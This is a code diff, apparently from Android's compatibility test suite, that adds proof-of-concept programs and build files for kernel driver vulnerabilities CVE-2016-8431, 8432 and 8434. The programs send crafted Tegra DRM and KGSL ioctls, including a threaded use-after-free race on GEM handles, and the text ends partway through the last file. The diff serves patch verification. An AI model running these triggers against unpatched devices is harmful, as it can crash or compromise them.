+ trigger_nvmap_alloc(trigger_nvmap_create());
+ prepare_data();
+ //trigger_nvmap_free();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ pthread_create(&tid, NULL, race_thread_2, NULL);
+ usleep(100 * 1000);
+ pthread_cond_broadcast(&cond);
+
+ sleep(100);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+
+struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+ gem_create.size = PAGE_SIZE;
+ return 0;
+}
+
+int main()
+{
+ int ret;
+ int i;
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].cmdbuf.offset = 8192;
+ relocs[i].target.handle = gem_create.handle;
+ relocs[i].target.offset = 8192;
+ }
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }else{
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+volatile struct drm_gem_close gem_close;
+
+volatile struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+volatile struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static int prepare()
+{
+ int i;
+
+ open_c.client = HOST1X_CLASS_VIC;
+
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+
+ gem_close.handle = 1;
+
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = 0;
+ relocs[i].cmdbuf.handle = 0;
+ relocs[i].cmdbuf.offset = 0;
+ relocs[i].target.handle = 0;
+ relocs[i].target.offset = 0;
+ }
+
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+
+ gem_create.size = PAGE_SIZE;
+
+ return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+ set_affinity(1);
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ return NULL;
+}
+
+int main()
+{
+ int ret;
+ int i;
+ __u64 try_time;
+
+ set_affinity(0);
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ try_time = 1;
+ while(1){
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].target.handle = gem_create.handle;
+ }
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ }
+ usleep(150);
+ while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+ }
+ try_time++;
+ }
+
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_join(submit_thread_id[i], NULL);
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..de88a3b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+ int type; /* Type of event (see list below) */
+ unsigned int timestamp; /* Timestamp to trigger event on */
+ unsigned int context_id; /* Context for the timestamp */
+ void __user *priv; /* Pointer to the event specific blob */
+ size_t len; /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+ _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
